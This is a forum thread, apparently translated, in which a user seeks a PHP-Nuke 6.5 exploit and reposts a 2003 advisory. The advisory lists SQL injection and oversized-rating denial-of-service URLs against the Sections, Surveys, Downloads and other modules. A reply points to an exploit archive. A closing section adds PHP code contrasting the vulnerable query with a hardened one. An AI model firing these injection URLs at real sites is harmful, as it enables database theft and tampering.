Hi, I've been looking for a PHP-Nuke exploit for a long time, but there isn't one for 6.5. I found these; apparently it says it works on 6.5 too.... If anyone has something, tell us too... Thanks to our good friend who introduced a few last time, but those don't work on 6.5 ..:)

PHP-Nuke Input Validation Flaws in Several Modules (Sections, AvantGo, Surveys, Downloads, Reviews, Web_Links) Let Remote Users Inject SQL Commands

SecurityTracker Alert ID: 1006793
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 18 2003
Impact: Denial of service via network, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included: Yes
Advisory: NovaPPC Security Research Group
Version(s): 5.5, 6.0, 6.5

Description: Lorenzo Manuel Hernandez Garcia-Hierro of NovaPPC reported several vulnerabilities in PHP-Nuke. A remote user can inject SQL commands to view or modify the underlying database. A remote user can also cause the database server to become unstable.

It is reported that a remote user can create a specially crafted URL to inject SQL commands to be executed by the underlying database. The following variables are affected:

'secid' variable of the Sections module
'sid' variable of the AvantGo module
'pollID' variable of the Surveys module
'cid' variable of the Downloads module
'id' variable of the Reviews module
'cid' variable of the Web_Links module

Some demonstration exploit URLs are provided:

http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY]
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY]
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY]
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=` [YOUR QUERY]
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD
http://[target]/modules.php?name=Reviews&rop=showcontent&id=` [YOUR QUERY]
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num

It is also reported that a remote user can cause the target database server to become unstable. To trigger the flaw, a remote user can send a large file rating that exceeds the number of characters permitted in the relevant database field. A demonstration exploit URL is provided:

http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999

The same type of URL can be used to inject SQL commands, as shown in the following demonstration exploit URL:

http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]

The 'cid' variable of the Web_Links module is also vulnerable to a denial of service attack via the 'rating' field. A demonstration exploit URL is provided:

http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=999999999999999999999999999999999

Impact: A remote user can gain access to the PHP-Nuke database to view private information and modify content.
Solution: No solution was available at the time of this entry.
Vendor URL: www.phpnuke.org/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Lorenzo Hernandez Garcia-Hierro novappc@novappc.com
Message History: None.

:D

This is something that might be useful to you. But honestly, on the site I'm linking you to there is every kind of vulnerability you could want; this one is for phpNuke itself: http://www.securityfocus.com/bid/7191/exploit/ ;)

Thanks a lot, dear god (I think your name is Meysam)! Anyway, I found lots of cool stuff in there! ;)
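The advisory quoted in this thread describes two defects in one code path: request parameters spliced straight into SQL, and a 'rating' value never checked against what the column can hold. The following is an added illustration, not PHP-Nuke's own code; the table and column names (nuke_downloads_downloads, cid, lid, title) and the 1..10 rating range are assumptions. It shows the vulnerable shape of a Downloads-module lookup next to a hardened version that validates the id and binds it as a parameter, plus the range check that turns the oversized rating into a rejected request:

```php
<?php
// Added illustration, not PHP-Nuke's own code. Table and column names
// (nuke_downloads_downloads, cid, lid, title) are assumed for the example.

// Vulnerable shape: the raw 'cid' parameter is concatenated into the query,
// so anything the client appends after the number is parsed as SQL.
function viewdownload_vulnerable(mysqli $db, array $get): mysqli_result|false
{
    $cid = $get['cid'] ?? '';
    return $db->query("SELECT lid, title FROM nuke_downloads_downloads WHERE cid=$cid");
}

// Hardened shape: allow-list the input type first, then bind it as a
// parameter so the value can never change the statement's structure.
function viewdownload_hardened(mysqli $db, array $get): mysqli_result|false
{
    $cid = filter_var($get['cid'] ?? null, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 0]]);
    if ($cid === false) {
        http_response_code(400);   // reject; do not try to "clean" the value
        return false;
    }
    $stmt = $db->prepare('SELECT lid, title FROM nuke_downloads_downloads WHERE cid = ?');
    $stmt->bind_param('i', $cid);
    $stmt->execute();
    return $stmt->get_result();    // requires the mysqlnd driver (PHP default)
}

// The rating defect: the advisory's 71-digit 'rating' overflows the column.
// FILTER_VALIDATE_INT fails on anything outside PHP's integer range, on
// non-numeric strings (the backtick payloads) and on values outside the
// assumed 1..10 scale, so what reaches the UPDATE is a small int or nothing.
function validate_rating(mixed $raw): ?int
{
    $r = filter_var($raw, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1, 'max_range' => 10]]);
    return $r === false ? null : $r;
}
```

The same two steps (type validation, then a bound parameter) apply to every variable the advisory lists; casting with `(int)` alone would stop the injection but silently turn the long rating into a wrong number instead of refusing it.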

